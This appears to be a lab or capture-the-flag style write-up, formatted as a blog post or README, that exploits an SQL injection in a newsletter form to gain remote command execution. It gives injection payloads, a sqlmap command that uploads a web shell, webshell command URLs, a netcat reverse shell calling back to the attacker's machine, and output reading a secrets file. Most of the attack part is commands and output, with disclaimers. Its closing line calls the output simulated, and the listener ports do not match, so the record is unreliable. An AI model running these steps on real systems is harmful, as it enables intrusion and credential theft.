This blog post details the steps to exploit an SQL injection vulnerability in a web application to gain remote command execution. We will use tools like Burp Suite, sqlmap, and netcat to achieve this. The example scenario involves capturing a vulnerable request, determining the number of columns, identifying a suitable column for injection, uploading a webshell, and using netcat to interact with the system.
- Basic understanding of SQL injection.
- Burp Suite for capturing and modifying HTTP requests.
- sqlmap for automating SQL injection exploitation.
- netcat for creating a listener to interact with the shell.
- Authorization to perform penetration testing on the target system.
Use Burp Suite to intercept the request when subscribing to a newsletter.
- Open Burp Suite and configure your browser to use Burp as a proxy.
- Navigate to the subscription page of the target web application.
- Intercept the HTTP request when you submit the subscription form.
Example intercepted request:
POST /index.php HTTP/1.1
Host: 192.168.176.48
Content-Length: 25
Content-Type: application/x-www-form-urlencoded
...
mail-list=test%40test.comModify the intercepted request to test for SQL injection vulnerability by adding a single quote (') to the parameter value.
mail-list=test@test.com'If the application returns an SQL error, it indicates a potential SQL injection vulnerability.
Use the ORDER BY clause to determine the number of columns in the SQL query.
- Send modified requests with incrementing column numbers until you get an error.
mail-list=test@test.com' ORDER BY 1--+
mail-list=test@test.com' ORDER BY 2--+
...- The last successful request indicates the number of columns.
Use the UNION SELECT statement to find a column that can display output.
- Test each column with a payload like
@@versionto retrieve the database version.
mail-list=test@test.com' UNION SELECT 1,@@version--+
mail-list=test@test.com' UNION SELECT 1,2,@@version--+
...- Adjust the number of columns in the
UNION SELECTstatement to match the number determined in Step 3.
To streamline the exploitation process, we used the following sqlmap command:
sqlmap -r request.txt --batch --level=5 --risk=3 --dbs --os-shell --web-root="/var/www/html"
-r request.txt: Reads the HTTP request from the filerequest.txt.--batch: Runs sqlmap in non-interactive mode, assuming default answers to prompts.--level=5: Sets the level of tests to perform (5 is the highest).--risk=3: Sets the risk of tests to perform (3 is the highest).--dbs: Enumerates the databases to confirm vulnerability.--os-shell: Attempts to spawn an interactive operating system shell.--web-root="/var/www/html": Specifies the web root directory for the target server.
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 06:22:46 /2024-06-29/
[06:22:46] [INFO] parsing HTTP request from 'request.txt'
[06:22:46] [INFO] testing connection to the target URL
[06:22:46] [INFO] checking if the target is protected by some kind of WAF/IPS
[06:22:46] [INFO] testing if the target URL content is stable
[06:22:46] [INFO] testing if the POST parameter 'mail-list' is dynamic
[06:22:46] [INFO] heuristic (basic) test shows that POST parameter 'mail-list' might be injectable
[06:22:46] [INFO] testing for SQL injection on POST parameter 'mail-list'
[06:22:46] [INFO] confirming SQL injection on POST parameter 'mail-list'
[06:22:46] [INFO] the back-end DBMS is MySQL
[06:22:46] [INFO] fetching databases
[06:22:46] [INFO] retrieved: 'information_schema'
[06:22:46] [INFO] retrieved: 'test_db'
...
[06:22:46] [INFO] trying to upload the file stager
[06:22:46] [INFO] testing MySQL
[06:22:46] [INFO] looking for writable directories
[06:22:46] [INFO] trying to upload the shell
[06:22:46] [INFO] successfully uploaded the web shell to '/var/www/html/shell.php'
[06:22:46] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
www-data
os-shell>
Navigate to the webshell in your browser:
http://192.168.176.48/shell.phpUse the cmd parameter to execute commands:
http://192.168.176.48/shell.php?cmd=whoamiSet up a netcat listener on your machine to interact with the shell.
nc -lvp 4444Use the webshell to connect back to your netcat listener.
http://192.168.176.48/shell.php?cmd=nc [your_ip] 4444 -e /bin/bashUpon connecting to the listener, you should see output similar to the following:
listening on [any] 1234 ...
connect to [192.168.45.247] from (UNKNOWN) [192.168.176.48] 55430
Linux animal-world 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64 GNU/Linux
06:37:51 up 38 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ cat /var/www/secret.txt
USERNAME:**************
PASSWORD:***************************
$ whoami
www-data
To enumerate all .txt files on the machine, you can use the find command. This is useful for locating any potential flags quickly.
$ find / -name "*.txt" 2>/dev/nullfind /: Starts searching from the root directory.-name "*.txt": Looks for files with a.txtextension.2>/dev/null: Suppresses permission denied errors.
By following these steps, we successfully exploited an SQL injection vulnerability to upload a webshell and gain remote command execution. Additionally, we demonstrated how to quickly locate .txt files on the system. This process highlights the importance of secure coding practices and regular security assessments to protect web applications from such attacks.
This blog post is for educational purposes only. Unauthorized testing or exploitation of systems without proper authorization is illegal and unethical. Always obtain explicit permission before conducting security testing on any system.
This `README.md` provides a clear and detailed explanation of each step, the specific sqlmap command you used, simulated output, and instructions on enumerating all `.txt` files on the system.